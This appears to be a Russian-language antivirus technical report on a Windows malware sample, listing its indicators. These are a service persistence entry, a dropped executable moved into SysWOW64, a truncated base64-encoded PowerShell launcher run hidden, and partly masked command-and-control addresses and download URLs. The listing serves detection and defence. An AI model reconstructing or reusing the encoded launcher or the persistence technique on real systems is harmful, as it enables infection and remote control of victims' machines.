Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\NlsData0045] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\NlsData0045] 'ImagePath' = '"%WINDIR%\SysWOW64\KBDPO\NlsData0045.exe"'
- 'NlsData0045' "%WINDIR%\SysWOW64\KBDPO\NlsData0045.exe"
- 'NlsData0045' %WINDIR%\SysWOW64\KBDPO\NlsData0045.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABDAG0ANgB5AGcAbQBnAD0AKAAoACcARgBfACcAKwAnAGgAYQB3ACcAKQArACcAcgBjACcAKQA7AC4AKAAnAG4AZQB3AC0AJwArACcAaQB0AGUAbQAnACkAIAAkAGUATgB2ADoAVABFAE0AUABcAFcAbwByAGQAXAAyADAAMQA5AFwAIAAtAGkAdABlAG...
- %TEMP%\word\2019\w3gvj2.exe
- %WINDIR%\syswow64\kbdpo\nlsdata0045.exe
- %TEMP%\word\2019\w3gvj2.exe в %WINDIR%\syswow64\kbdpo\nlsdata0045.exe
- '37.#2.87.0':80
- '87.##8.70.45':8080
- http://bl####ngstorehn.com/2hqq/aD9/
- http://87.###.70.45:8080/u1tJ19Jdj/uclOF/M5phsS/ZOOvji36WVGWVr97E/hV40l0E16Gs5A/oviSgh1S3W7xxc4BSc/ via 87.##8.70.45
- DNS ASK bl####ngstorehn.com
- '%TEMP%\word\2019\w3gvj2.exe'
- '%WINDIR%\syswow64\kbdpo\nlsdata0045.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABDAG0ANgB5AGcAbQBnAD0AKAAoACcARgBfACcAKwAnAGgAYQB3ACcAKQArACcAcgBjACcAKQA7AC4AKAAnAG4AZQB3AC0AJwArACcAaQB0AGUAbQAnACkAIAAkAGUATgB2ADoAVABFAE0AUABcAFcAbwByAGQAXAAyADAAMQA5AFwAIAAtAGkAdABlAG...' (со скрытым окном)